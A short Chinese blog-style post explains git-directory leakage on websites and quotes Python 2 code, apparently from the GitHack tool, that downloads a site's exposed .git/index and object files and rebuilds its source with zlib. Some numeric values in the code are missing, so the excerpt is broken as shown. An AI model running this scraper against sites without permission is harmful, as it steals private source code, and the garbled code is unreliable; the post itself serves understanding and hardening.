之前做过git的加固 但是这东西还是没办法避免的
之前看了乌云的提交的git泄漏,但是都没有详细的原理,去了lijiejie的博客(字太难打了,大师傅别打我 哈哈)
如果一个网站存在git泄漏,git可以还原代码,这样进而导致的代码泄漏的问题。
网上git和国外的那个脚本的工作原理:
1.先去解析.git/index
拿LIJIEJIE的CODE:
class Scanner(object):
def __init__(self):
self.base_url = sys.argv[-]
self.domain = urlparse.urlparse(sys.argv[-]).netloc.replace(':', '_')
if not os.path.exists(self.domain):
os.mkdir(self.domain)
print '[+] Download and parse index file ...'
data = self._request_data(sys.argv[-] + '/index')
with open('index', 'wb') as f:
f.write(data)
self.queue = Queue.Queue()
for entry in parse('index'):
if "sha1" in entry.keys():
self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
print entry['name']
self.lock = threading.Lock()
self.thread_count =
self.STOP_ME = False
然后去找文件名
2.然后去.git/object文件夹下载对应的文件名:
def get_back_file(self):
while not self.STOP_ME:
try:
sha1, file_name = self.queue.get(timeout=0.5)
except:
break
for i in range(3):
try:
folder = '/objects/%s/' % sha1[:2]
data = self._request_data(self.base_url + folder + sha1[2:])
data = zlib.decompress(data)
data = re.sub('blob \d+\00', '', data)
target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
if target_dir and not os.path.exists(target_dir):
os.makedirs(target_dir)
with open( os.path.join(self.domain, file_name) , 'wb') as f:
f.write(data)
self._print('[OK] %s' % file_name)
break
except urllib2.HTTPError, e:
if str(e).find('HTTP Error 404') >=0:
self._print('[File not found] %s' % file_name)
break
except Exception, e:
self._print('[Error] %s' % e)
self.exit_thread()
3.使用zlib,重构源码